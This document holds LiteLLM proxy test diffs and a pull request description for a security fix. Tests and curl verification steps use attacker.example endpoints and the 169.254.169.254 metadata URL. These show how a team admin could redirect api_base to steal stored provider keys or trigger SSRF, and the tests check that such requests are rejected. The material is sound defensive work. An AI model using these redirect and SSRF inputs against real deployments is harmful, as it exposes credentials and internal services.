+                    prisma_client=MockPrismaClient(team_exists=True),  # type: ignore
+                )
+        assert str(e.value.code) == "403"
+
+    # --- model_id spoofing + alias residue (126 / 168b) ---
+
+    @pytest.mark.asyncio
+    async def test_add_new_model_rejects_colliding_model_id(self):
+        from litellm.proxy.management_endpoints.model_management_endpoints import (
+            add_new_model,
+        )
+        from litellm.proxy.proxy_server import ProxyException
+        from litellm.types.router import Deployment, LiteLLM_Params
+
+        mock_router = MagicMock()
+        # The supplied id already belongs to a live (config) deployment.
+        mock_router.has_model_id = MagicMock(return_value=True)
+        mock_prisma = MagicMock()
+        mock_prisma.db = MagicMock()
+        mock_prisma.db.litellm_proxymodeltable = AsyncMock()
+
+        _PS = "litellm.proxy.proxy_server"
+        with (
+            patch(f"{_PS}.prisma_client", mock_prisma),
+            patch(f"{_PS}.store_model_in_db", True),
+            patch(f"{_PS}.proxy_config", MagicMock()),
+            patch(f"{_PS}.proxy_logging_obj", MagicMock()),
+            patch(f"{_PS}.general_settings", {}),
+            patch(f"{_PS}.premium_user", True),
+            patch(f"{_PS}.llm_router", mock_router),
+        ):
+            with pytest.raises(ProxyException) as e:
+                await add_new_model(
+                    model_params=Deployment(
+                        model_name="x",
+                        litellm_params=LiteLLM_Params(
+                            model="openai/gpt-4", api_key="k"
+                        ),
+                        model_info={"id": "config-model-1"},
+                    ),
+                    user_api_key_dict=self._admin(),
+                )
+            assert str(e.value.code) == "400"
+            mock_prisma.db.litellm_proxymodeltable.create.assert_not_called()
+
+    @pytest.mark.asyncio
+    async def test_delete_preserves_config_origin_router_deployment(self):
+        from litellm.proxy.management_endpoints.model_management_endpoints import (
+            ModelInfoDelete,
+            delete_model as delete_model_endpoint,
+        )
+        from litellm.types.router import Deployment, LiteLLM_Params, ModelInfo
+
+        model_id = "config-model-1"
+        db_row = LiteLLM_ProxyModelTable(
+            model_id=model_id,
+            model_name="m",
+            litellm_params={"model": "openai/gpt-4"},
+            model_info={"id": model_id},  # no team_id (global/non-team row)
+            created_by="a",
+            updated_by="a",
+        )
+        mock_prisma = MagicMock()
+        mock_prisma.db = MagicMock()
+        mock_prisma.db.litellm_proxymodeltable = AsyncMock()
+        mock_prisma.db.litellm_proxymodeltable.find_unique = AsyncMock(
+            return_value=db_row
+        )
+        mock_prisma.db.litellm_proxymodeltable.delete = AsyncMock(return_value=db_row)
+
+        mock_router = MagicMock()
+        mock_router.delete_deployment = MagicMock()
+        # The live router entry for this id is config-origin (db_model unset).
+        mock_router.get_deployment = MagicMock(
+            return_value=Deployment(
+                model_name="m",
+                litellm_params=LiteLLM_Params(model="openai/gpt-4"),
+                model_info=ModelInfo(id=model_id),
+            )
+        )
+
+        _PS = "litellm.proxy.proxy_server"
+        with (
+            patch(f"{_PS}.prisma_client", mock_prisma),
+            patch(f"{_PS}.store_model_in_db", True),
+            patch(f"{_PS}.premium_user", True),
+            patch(f"{_PS}.llm_router", mock_router),
+        ):
+            await delete_model_endpoint(
+                model_info=ModelInfoDelete(id=model_id),
+                user_api_key_dict=self._admin(),
+            )
+            mock_prisma.db.litellm_proxymodeltable.delete.assert_awaited_once()
+            # The config deployment must NOT be evicted from the router.
+            mock_router.delete_deployment.assert_not_called()
+
+    @pytest.mark.asyncio
+    async def test_delete_uses_team_public_model_name_for_alias(self):
+        from litellm.proxy.management_endpoints import (
+            model_management_endpoints as mod,
+        )
+        from litellm.proxy.management_endpoints.model_management_endpoints import (
+            ModelInfoDelete,
+            delete_model as delete_model_endpoint,
+        )
+
+        model_id = "team-dep-1"
+        db_row = LiteLLM_ProxyModelTable(
+            model_id=model_id,
+            model_name="model_name_teamX_uuid",  # internal UUID name
+            litellm_params={"model": "openai/gpt-4"},
+            model_info={
+                "id": model_id,
+                "team_id": "teamX",
+                "team_public_model_name": "team-alias",
+            },
+            created_by="a",
+            updated_by="a",
+        )
+        team_row = LiteLLM_TeamTable(
+            team_id="teamX",
+            team_alias="t",
+            models=["team-alias"],
+            members_with_roles=[],
+        )
+        mock_prisma = MagicMock()
+        mock_prisma.db = MagicMock()
+        mock_prisma.db.litellm_proxymodeltable = AsyncMock()
+        mock_prisma.db.litellm_proxymodeltable.find_unique = AsyncMock(
+            return_value=db_row
+        )
+        mock_prisma.db.litellm_proxymodeltable.delete = AsyncMock(return_value=db_row)
+        mock_prisma.db.litellm_teamtable = AsyncMock()
+        mock_prisma.db.litellm_teamtable.find_unique = AsyncMock(return_value=team_row)
+        mock_prisma.db.litellm_teamtable.update = AsyncMock()
+
+        mock_router = MagicMock()
+        mock_router.get_deployment = MagicMock(return_value=None)
+
+        captured = {}
+
+        async def fake_delete_alias(public_model_name, prisma_client):
+            captured["public_model_name"] = public_model_name
+            return []
+
+        _PS = "litellm.proxy.proxy_server"
+        with (
+            patch(f"{_PS}.prisma_client", mock_prisma),
+            patch(f"{_PS}.store_model_in_db", True),
+            patch(f"{_PS}.premium_user", True),
+            patch(f"{_PS}.llm_router", mock_router),
+            patch.object(mod, "delete_team_model_alias", side_effect=fake_delete_alias),
+        ):
+            await delete_model_endpoint(
+                model_info=ModelInfoDelete(id=model_id),
+                user_api_key_dict=self._admin(),
+            )
+        # Must use the public alias, not the internal UUID model_name.
+        assert captured.get("public_model_name") == "team-alias"
+
+    @pytest.mark.asyncio
+    async def test_legacy_update_model_pricing_is_proxy_admin_only(self):
+        """The legacy POST /model/update path must enforce the same pricing gate
+        as PATCH, so it can't be used to bypass it."""
+        from litellm.proxy.management_endpoints.model_management_endpoints import (
+            update_model,
+        )
+        from litellm.proxy.proxy_server import ProxyException
+        from litellm.types.router import (
+            ModelInfo,
+            updateDeployment,
+            updateLiteLLMParams,
+        )
+
+        model_id = "db-model-1"
+        existing_row = MagicMock()
+        existing_row.litellm_params = {"model": "openai/gpt-4o-mini", "api_key": "sk-x"}
+        existing_row.model_dump.return_value = {
+            "model_name": "m",
+            "litellm_params": existing_row.litellm_params,
+            "model_info": {"id": model_id, "team_id": "teamX"},
+        }
+
+        mock_prisma = MagicMock()
+        mock_prisma.db.litellm_proxymodeltable.find_unique = AsyncMock(
+            return_value=existing_row
+        )
+        mock_prisma.db.litellm_proxymodeltable.update = AsyncMock()
+
+        with (
+            patch("litellm.proxy.proxy_server.prisma_client", mock_prisma),
+            patch("litellm.proxy.proxy_server.llm_router", MagicMock()),
+            patch("litellm.proxy.proxy_server.store_model_in_db", True),
+            patch("litellm.proxy.proxy_server.premium_user", True),
+            patch(
+                "litellm.proxy.management_endpoints.model_management_endpoints.ModelManagementAuthChecks.can_user_make_model_call",
+                new=AsyncMock(return_value=None),
+            ),
+        ):
+            with pytest.raises(ProxyException) as e:
+                await update_model(
+                    model_params=updateDeployment(
+                        litellm_params=updateLiteLLMParams(input_cost_per_token=0.0),
+                        model_info=ModelInfo(id=model_id),
+                    ),
+                    user_api_key_dict=self._non_admin(),
+                )
+            assert str(e.value.code) == "403"
+            mock_prisma.db.litellm_proxymodeltable.update.assert_not_called()

--- a/tests/test_litellm/proxy/management_endpoints/test_model_management_endpoints.py
+++ b/tests/test_litellm/proxy/management_endpoints/test_model_management_endpoints.py
@@ -2480,3 +2480,26 @@ class TestModelMgmtAuthzHardening:
             model_info=None,
             user_api_key_dict=self._admin(),
         )
+
+    def test_destination_change_clears_inherited_credential_per_field(self):
+        from litellm.proxy.management_endpoints.model_management_endpoints import (
+            _strip_credentials_on_destination_change,
+        )
+
+        # Patch redirects api_base AND supplies an UNRELATED credential
+        # (aws_secret_access_key); the inherited api_key must still be dropped.
+        merged = {
+            "api_key": "sk-inherited",
+            "aws_secret_access_key": "supplied",
+            "api_base": "https://attacker.example",
+        }
+        patch_plaintext = {
+            "api_base": "https://attacker.example",
+            "aws_secret_access_key": "supplied",
+        }
+        db = {"api_base": "https://real.example", "api_key": "sk-inherited"}
+        _strip_credentials_on_destination_change(
+            merged, patch_plaintext, lambda f: db.get(f)
+        )
+        assert "api_key" not in merged  # inherited, not re-supplied -> dropped
+        assert merged.get("aws_secret_access_key") == "supplied"  # supplied -> kept

--- a/tests/test_litellm/proxy/management_endpoints/test_model_management_endpoints.py
+++ b/tests/test_litellm/proxy/management_endpoints/test_model_management_endpoints.py
@@ -1996,10 +1996,22 @@ class TestModelMgmtAuthzHardening:
         db = {"api_base": "https://real.example.com", "api_key": "sk-stored"}
         self._assert_resupply({"api_base": "https://real.example.com"}, db)
 
-    def test_keyless_model_destination_change_is_allowed(self):
-        # A model that never carried a credential has nothing to leak.
+    def test_keyless_model_destination_change_requires_credential(self):
+        from litellm.proxy._types import ProxyException
+
+        # Even a model stored without a credential falls back to the proxy env
+        # key (e.g. OPENAI_API_KEY) at call time, so repointing it without
+        # supplying a credential must be rejected.
         db = {"api_base": "https://real.example.com"}
-        self._assert_resupply({"api_base": "https://attacker.example.com"}, db)
+        with pytest.raises(ProxyException) as e:
+            self._assert_resupply({"api_base": "https://attacker.example.com"}, db)
+        assert str(e.value.code) == "400"
+
+    def test_keyless_model_destination_change_with_credential_is_allowed(self):
+        db = {"api_base": "https://real.example.com"}
+        self._assert_resupply(
+            {"api_base": "https://attacker.example.com", "api_key": "sk-own"}, db
+        )
 
     def test_validate_model_url_params_blocks_internal_ip(self):
         import litellm
@@ -2017,6 +2029,10 @@ class TestModelMgmtAuthzHardening:
             with pytest.raises(ProxyException):
                 _validate_model_url_params(
                     {"aws_bedrock_runtime_endpoint": "http://169.254.169.254/"}
+                )
+            with pytest.raises(ProxyException):
+                _validate_model_url_params(
+                    {"sagemaker_base_url": "http://169.254.169.254/"}
                 )
         # Honors the opt-out toggle (internal endpoints / Ollama).
         with (
@@ -2466,3 +2482,65 @@ class TestModelMgmtAuthzHardening:
                 db,
             )
         assert e.value.param == "api_key"
+
+    # --- Veria sweep follow-ups: authoritative pricing set, base_model, extra URLs ---
+
+    def test_spend_affecting_fields_are_proxy_admin_only(self):
+        from litellm.proxy._types import ProxyException
+        from litellm.proxy.management_endpoints.model_management_endpoints import (
+            _assert_privileged_model_fields_authorized,
+            _is_pricing_field,
+        )
+        from litellm.types.router import ModelInfo, updateLiteLLMParams
+
+        # Gate uses litellm's authoritative custom-pricing key set (not a subset),
+        # plus base_model which redirects the cost-lookup model.
+        for f in (
+            "tiered_pricing",
+            "cache_read_input_token_cost_flex",
+            "cache_creation_input_token_cost_above_1hr",
+            "base_model",
+            "input_cost_per_second",
+        ):
+            assert _is_pricing_field(f), f
+        for f in ("api_key", "api_base", "model", "custom_llm_provider"):
+            assert not _is_pricing_field(f), f
+
+        # A non-admin cannot zero a cache cost field outside the old subset...
+        with pytest.raises(ProxyException) as e:
+            _assert_privileged_model_fields_authorized(
+                litellm_params=updateLiteLLMParams(
+                    cache_read_input_token_cost_flex=0.0
+                ),
+                model_info=None,
+                user_api_key_dict=self._non_admin(),
+            )
+        assert str(e.value.code) == "403"
+        # ...nor repoint cost lookup via model_info.base_model.
+        with pytest.raises(ProxyException) as e:
+            _assert_privileged_model_fields_authorized(
+                litellm_params=None,
+                model_info=ModelInfo(base_model="gpt-3.5-turbo"),
+                user_api_key_dict=self._non_admin(),
+            )
+        assert str(e.value.code) == "403"
+        # Proxy admin may set them.
+        _assert_privileged_model_fields_authorized(
+            litellm_params=updateLiteLLMParams(cache_read_input_token_cost_flex=0.0),
+            model_info=ModelInfo(base_model="gpt-3.5-turbo"),
+            user_api_key_dict=self._admin(),
+        )
+
+    def test_sagemaker_base_url_change_requires_credential_resupply(self):
+        from litellm.proxy._types import ProxyException
+
+        # sagemaker_base_url retargets outbound SageMaker traffic, so changing it
+        # without re-supplying the stored AWS credential must be rejected.
+        db = {
+            "sagemaker_base_url": "https://real.example",
+            "aws_secret_access_key": "stored",
+        }
+        with pytest.raises(ProxyException):
+            self._assert_resupply(
+                {"sagemaker_base_url": "https://attacker.example"}, db
+            )

--- a/tests/test_litellm/proxy/management_endpoints/test_model_management_endpoints.py
+++ b/tests/test_litellm/proxy/management_endpoints/test_model_management_endpoints.py
@@ -1956,81 +1956,50 @@ class TestModelMgmtAuthzHardening:
         info = json.loads(result["model_info"])
         assert info["id"] == "real-id"
 
-    def test_api_base_change_clears_inherited_credential(self):
-        import litellm
+    @staticmethod
+    def _assert_resupply(patch_plaintext, db):
         from litellm.proxy.management_endpoints.model_management_endpoints import (
-            update_db_model,
+            _assert_credential_resupplied_on_destination_change,
         )
-        from litellm.types.router import updateLiteLLMParams
 
-        with (
-            patch.object(litellm, "user_url_validation", False),
-            patch(
-                "litellm.proxy.management_endpoints.model_management_endpoints.encrypt_value_helper",
-                side_effect=lambda value, **kwargs: value,
-            ),
-        ):
-            result = update_db_model(
-                db_model=self._db_model_with_secret(),
-                updated_patch=updateDeployment(
-                    litellm_params=updateLiteLLMParams(
-                        api_base="https://attacker.example.com"
-                    )
-                ),
-            )
-        params = json.loads(result["litellm_params"])
-        assert "api_key" not in params  # stored secret must not ride to new base
-
-    def test_api_base_change_with_new_key_keeps_credential(self):
-        import litellm
-        from litellm.proxy.management_endpoints.model_management_endpoints import (
-            update_db_model,
+        _assert_credential_resupplied_on_destination_change(
+            patch_plaintext, lambda field: db.get(field)
         )
-        from litellm.types.router import updateLiteLLMParams
 
-        with (
-            patch.object(litellm, "user_url_validation", False),
-            patch(
-                "litellm.proxy.management_endpoints.model_management_endpoints.encrypt_value_helper",
-                side_effect=lambda value, **kwargs: value,
-            ),
-        ):
-            result = update_db_model(
-                db_model=self._db_model_with_secret(),
-                updated_patch=updateDeployment(
-                    litellm_params=updateLiteLLMParams(
-                        api_base="https://attacker.example.com", api_key="sk-new"
-                    )
-                ),
+    def test_destination_change_without_resupply_is_rejected(self):
+        from litellm.proxy._types import ProxyException
+
+        db = {"api_base": "https://real.example.com", "api_key": "sk-stored"}
+        # Redirecting api_base without re-supplying the stored key must be
+        # rejected; clearing it would fall back to the proxy env key instead.
+        with pytest.raises(ProxyException) as e:
+            self._assert_resupply({"api_base": "https://attacker.example.com"}, db)
+        assert str(e.value.code) == "400"
+
+    def test_empty_credential_resupply_is_rejected(self):
+        from litellm.proxy._types import ProxyException
+
+        db = {"api_base": "https://real.example.com", "api_key": "sk-stored"}
+        # An empty key is not a fresh credential: it resolves to OPENAI_API_KEY.
+        with pytest.raises(ProxyException):
+            self._assert_resupply(
+                {"api_base": "https://attacker.example.com", "api_key": ""}, db
             )
-        params = json.loads(result["litellm_params"])
-        assert "api_key" in params  # caller re-supplied a key, so it is kept
 
-    def test_unchanged_destination_keeps_credential(self):
-        import litellm
-        from litellm.proxy.management_endpoints.model_management_endpoints import (
-            update_db_model,
+    def test_destination_change_with_resupply_is_allowed(self):
+        db = {"api_base": "https://real.example.com", "api_key": "sk-stored"}
+        self._assert_resupply(
+            {"api_base": "https://attacker.example.com", "api_key": "sk-new"}, db
         )
-        from litellm.types.router import updateLiteLLMParams
 
-        # Re-saving the same api_base (e.g. a UI resend) must NOT clear the key.
-        with (
-            patch.object(litellm, "user_url_validation", False),
-            patch(
-                "litellm.proxy.management_endpoints.model_management_endpoints.encrypt_value_helper",
-                side_effect=lambda value, **kwargs: value,
-            ),
-        ):
-            result = update_db_model(
-                db_model=self._db_model_with_secret(),
-                updated_patch=updateDeployment(
-                    litellm_params=updateLiteLLMParams(
-                        api_base="https://real.example.com"
-                    )
-                ),
-            )
-        params = json.loads(result["litellm_params"])
-        assert "api_key" in params
+    def test_unchanged_destination_is_allowed(self):
+        db = {"api_base": "https://real.example.com", "api_key": "sk-stored"}
+        self._assert_resupply({"api_base": "https://real.example.com"}, db)
+
+    def test_keyless_model_destination_change_is_allowed(self):
+        # A model that never carried a credential has nothing to leak.
+        db = {"api_base": "https://real.example.com"}
+        self._assert_resupply({"api_base": "https://attacker.example.com"}, db)
 
     def test_validate_model_url_params_blocks_internal_ip(self):
         import litellm
@@ -2481,25 +2450,19 @@ class TestModelMgmtAuthzHardening:
             user_api_key_dict=self._admin(),
         )
 
-    def test_destination_change_clears_inherited_credential_per_field(self):
-        from litellm.proxy.management_endpoints.model_management_endpoints import (
-            _strip_credentials_on_destination_change,
-        )
+    def test_destination_change_partial_resupply_is_rejected(self):
+        from litellm.proxy._types import ProxyException
 
         # Patch redirects api_base AND supplies an UNRELATED credential
-        # (aws_secret_access_key); the inherited api_key must still be dropped.
-        merged = {
-            "api_key": "sk-inherited",
-            "aws_secret_access_key": "supplied",
-            "api_base": "https://attacker.example",
-        }
-        patch_plaintext = {
-            "api_base": "https://attacker.example",
-            "aws_secret_access_key": "supplied",
-        }
+        # (aws_secret_access_key); the inherited api_key is still not re-supplied,
+        # so the change must be rejected rather than letting api_key ride along.
         db = {"api_base": "https://real.example", "api_key": "sk-inherited"}
-        _strip_credentials_on_destination_change(
-            merged, patch_plaintext, lambda f: db.get(f)
-        )
-        assert "api_key" not in merged  # inherited, not re-supplied -> dropped
-        assert merged.get("aws_secret_access_key") == "supplied"  # supplied -> kept
+        with pytest.raises(ProxyException) as e:
+            self._assert_resupply(
+                {
+                    "api_base": "https://attacker.example",
+                    "aws_secret_access_key": "supplied",
+                },
+                db,
+            )
+        assert e.value.param == "api_key"

--- a/tests/test_litellm/proxy/management_endpoints/test_model_management_endpoints.py
+++ b/tests/test_litellm/proxy/management_endpoints/test_model_management_endpoints.py
@@ -2044,6 +2044,11 @@ class TestModelMgmtAuthzHardening:
                 _validate_model_url_params(
                     {"api_base": "http://169.254.169.254/latest/meta-data/"}
                 )
+            # Provider-specific endpoint URLs are guarded too, not just api_base.
+            with pytest.raises(ProxyException):
+                _validate_model_url_params(
+                    {"aws_bedrock_runtime_endpoint": "http://169.254.169.254/"}
+                )
         # Honors the opt-out toggle (internal endpoints / Ollama).
         with (
             patch.object(litellm, "user_url_validation", False),

--- a/tests/test_litellm/proxy/management_endpoints/test_model_management_endpoints.py
+++ b/tests/test_litellm/proxy/management_endpoints/test_model_management_endpoints.py
@@ -2544,3 +2544,17 @@ class TestModelMgmtAuthzHardening:
             self._assert_resupply(
                 {"sagemaker_base_url": "https://attacker.example"}, db
             )
+
+    def test_sts_endpoint_change_requires_web_identity_token_resupply(self):
+        from litellm.proxy._types import ProxyException
+
+        # Repointing aws_sts_endpoint must require re-supplying a stored web
+        # identity token; supplying an unrelated credential must not let it ride.
+        db = {
+            "aws_sts_endpoint": "https://sts.real",
+            "aws_web_identity_token": "stored-token",
+        }
+        with pytest.raises(ProxyException):
+            self._assert_resupply(
+                {"aws_sts_endpoint": "https://sts.attacker", "api_key": "x"}, db
+            )

--- a/tests/test_litellm/proxy/management_endpoints/test_model_management_endpoints.py
+++ b/tests/test_litellm/proxy/management_endpoints/test_model_management_endpoints.py
@@ -2423,3 +2423,55 @@ class TestModelMgmtAuthzHardening:
                 )
             assert str(e.value.code) == "403"
             mock_prisma.db.litellm_proxymodeltable.update.assert_not_called()
+
+    # --- Veria review follow-ups: broader pricing set + os.environ/ refs ---
+
+    def test_non_special_pricing_field_is_proxy_admin_only(self):
+        from litellm.proxy._types import ProxyException
+        from litellm.proxy.management_endpoints.model_management_endpoints import (
+            _assert_privileged_model_fields_authorized,
+        )
+        from litellm.types.router import updateLiteLLMParams
+
+        # input_cost_per_second is a cost field NOT in SPECIAL_MODEL_INFO_PARAMS.
+        with pytest.raises(ProxyException) as e:
+            _assert_privileged_model_fields_authorized(
+                litellm_params=updateLiteLLMParams(input_cost_per_second=0.0),
+                model_info=None,
+                user_api_key_dict=self._non_admin(),
+            )
+        assert str(e.value.code) == "403"
+        # Proxy admin may set it.
+        _assert_privileged_model_fields_authorized(
+            litellm_params=updateLiteLLMParams(input_cost_per_second=0.0),
+            model_info=None,
+            user_api_key_dict=self._admin(),
+        )
+
+    def test_env_reference_rejected_for_non_admin(self):
+        from litellm.proxy._types import ProxyException
+        from litellm.proxy.management_endpoints.model_management_endpoints import (
+            _assert_privileged_model_fields_authorized,
+        )
+        from litellm.types.router import updateLiteLLMParams
+
+        # os.environ/ api_key would resolve to the proxy's own global secret.
+        with pytest.raises(ProxyException) as e:
+            _assert_privileged_model_fields_authorized(
+                litellm_params=updateLiteLLMParams(api_key="os.environ/OPENAI_API_KEY"),
+                model_info=None,
+                user_api_key_dict=self._non_admin(),
+            )
+        assert str(e.value.code) == "403"
+        # A literal credential is fine for a non-admin.
+        _assert_privileged_model_fields_authorized(
+            litellm_params=updateLiteLLMParams(api_key="sk-literal"),
+            model_info=None,
+            user_api_key_dict=self._non_admin(),
+        )
+        # Proxy admins use env references as the normal config pattern.
+        _assert_privileged_model_fields_authorized(
+            litellm_params=updateLiteLLMParams(api_key="os.environ/OPENAI_API_KEY"),
+            model_info=None,
+            user_api_key_dict=self._admin(),
+        )


### PR DESCRIPTION
## Type

🐛 Bug Fix

## Changes

The model-management write paths and the connection-test endpoint authorized callers at the whole-model level but applied no field-level authorization and, in places, derived team scope and ownership from the request body rather than the persisted row. This let a team admin take several actions they should not be able to:

- rename a team-scoped model into the global routing pool by sending a PATCH with `model_info` omitted, so traffic from teamless callers could be intercepted;
- zero out or clear a model's per-token pricing to escape spend/budget tracking;
- bind another tenant's stored credential to their own model by name (`litellm_credential_name`), since credentials resolve globally by name with no ownership model;
- point an existing model's `api_base` at an attacker-controlled host while the encrypted provider key stayed attached, so the next completion shipped the key to the attacker; or aim `api_base` at an internal address or cloud metadata endpoint (SSRF) on a stored config;
- create a team model with no credential of its own and silently ride the proxy operator's global provider keys;
- spoof a deployment id at `/model/new` to later delete a config-based deployment out of the in-memory router (cross-tenant denial of service);
- and, via `POST /health/test_connection`, probe any deployment by id and exfiltrate its inherited credential to a request-supplied `api_base`, because the authorization check trusted the `model_info` in the request body instead of the resolved deployment's owner.

This change closes those paths. Team scope is inherited from the persisted row when a PATCH omits it, so a team model keeps its internal name and cannot be moved to another team. Spend-affecting fields are restricted to proxy admins: the gate keys off litellm's own custom-pricing field set (the same fields the cost calculator reads, so it cannot drift behind it) plus `base_model`, which redirects the cost-lookup model, and `litellm_credential_name` binding. Non-admin model parameters cannot reference `os.environ/` server secrets, and a non-admin team model must supply its own literal credential. Caller-controlled endpoint URLs (`api_base`, `base_url`, `aws_bedrock_runtime_endpoint`, `aws_sts_endpoint`, `sagemaker_base_url`, `s3_endpoint_url`, `deployment_url`, mirroring the set litellm already bans at request time) are SSRF-validated on write under the existing `user_url_validation` toggle, with `user_url_allowed_hosts` as the allowlist escape hatch for internal endpoints. When a non-admin changes a model's destination, the change is rejected unless the request supplies a non-empty credential the destination's provider actually consumes (an AWS credential for AWS endpoints, since Bedrock/SageMaker sign with ambient credentials regardless of an `api_key`), and every credential the model already had must be re-provided; clearing the credential is not enough because an empty or absent key (including on a previously key-less model) falls back to the proxy's environment or ambient secret and would still be sent to the new endpoint. The deployment id is pinned to the row's primary key; `/model/new` rejects an id that collides with a live deployment and `/model/delete` only evicts router entries that originated from the DB; team aliases are deleted by their public name and only within the owning team, so one team admin cannot remove another team's alias that points at the same public name. The legacy `POST /model/update` path is routed through the same guards. And `/health/test_connection` now authorizes against the resolved deployment's owner; a non-admin who overrides the connection target must supply their own non-empty credential and a non-internal URL, so neither an inherited credential nor the proxy's environment fallback (e.g. `OPENAI_API_KEY`) is sent to a caller-chosen, possibly internal, address.

The same guards are applied consistently across `POST /model/new`, `POST /model/update`, `PATCH /model/{id}/update`, `POST /model/delete`, and `POST /health/test_connection`.

## Upgrade notes

Two behaviors tighten and may need an operator action:

- If you store models whose `api_base` points at an internal/self-hosted endpoint (e.g. a vLLM or Ollama box on `10.x`/`127.0.0.1`), add those hosts to `general_settings.user_url_allowed_hosts`, or they will be rejected on create/update while `user_url_validation` is on (its default). This matches the policy already applied to request-time `api_base`.
- Team admins who today create key-less team models that rely on the proxy's global provider keys must now supply a credential (`api_key`) on the team model. Proxy admins are unaffected and may still create credential-optional models.
- When a non-admin edits an existing model's endpoint (`api_base`/`base_url`/provider endpoint), they must also re-provide the model's credential with a non-empty value in the same request, otherwise the update is rejected. Proxy admins are unaffected.

## Pre-Submission checklist

- [x] I have added meaningful tests
- [x] My PR's scope is as isolated as possible; it only solves 1 specific problem

## Screenshots / Proof of Fix

Run a proxy locally and exercise the endpoints. As a proxy admin first set up a team and a team-scoped model, then act as a team admin against it.

1. Start the proxy: `python litellm/proxy/proxy_cli.py --config litellm/proxy/dev_config.yaml --detailed_debug`
2. SSRF guard on create (admin key):
   `curl -sS http://localhost:4000/model/new -H "Authorization: Bearer $ADMIN_KEY" -H 'content-type: application/json' -d '{"model_name":"x","litellm_params":{"model":"openai/gpt-4o-mini","api_key":"sk-x","api_base":"http://169.254.169.254/latest/meta-data/"}}'` — expect HTTP 400 rejecting the api_base.
3. Create a team and a team-scoped model (admin), then mint a team-admin key for that team.
4. As the team admin, attempt the blocked actions against the team model and confirm each is refused:
   - rename to a global name: `curl -sS -X PATCH http://localhost:4000/model/$MODEL_ID/update -H "Authorization: Bearer $TEAM_ADMIN_KEY" -H 'content-type: application/json' -d '{"model_name":"gpt-4"}'` — then GET `/model/info` and confirm the stored `model_name` is still the internal `model_name_<team>_<uuid>`, not `gpt-4`.
   - zero pricing: `... -d '{"litellm_params":{"input_cost_per_token":0},"model_info":{"id":"'$MODEL_ID'"}}'` — expect HTTP 403.
   - bind a credential by name: `... -d '{"litellm_params":{"litellm_credential_name":"some-cred"},"model_info":{"id":"'$MODEL_ID'"}}'` — expect HTTP 403.
   - re-point the destination without re-supplying the key: `... -d '{"litellm_params":{"api_base":"https://attacker.example"},"model_info":{"id":"'$MODEL_ID'"}}'` — expect HTTP 400 requiring the `api_key` to be re-provided; repeating with a non-empty `api_key` in `litellm_params` succeeds.
5. As the team admin, `POST /health/test_connection` with another deployment's `model_info.id`, your own `team_id`, and an `api_base` override — expect HTTP 400/403 instead of an outbound call carrying the inherited key. Also try an ad-hoc model (`{"model":"openai/gpt-4o","api_base":"https://attacker.example/v1"}`) with no `api_key`; expect HTTP 400 (otherwise the proxy's `OPENAI_API_KEY` would be sent to the override), and an `api_base` of `http://169.254.169.254/` is rejected by the SSRF guard.
6. Confirm the same operations succeed for the proxy admin.
